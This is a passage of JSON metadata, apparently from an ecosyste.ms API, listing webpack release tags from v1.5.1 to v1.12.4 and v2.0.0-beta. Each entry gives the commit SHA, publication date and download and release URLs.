4e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at"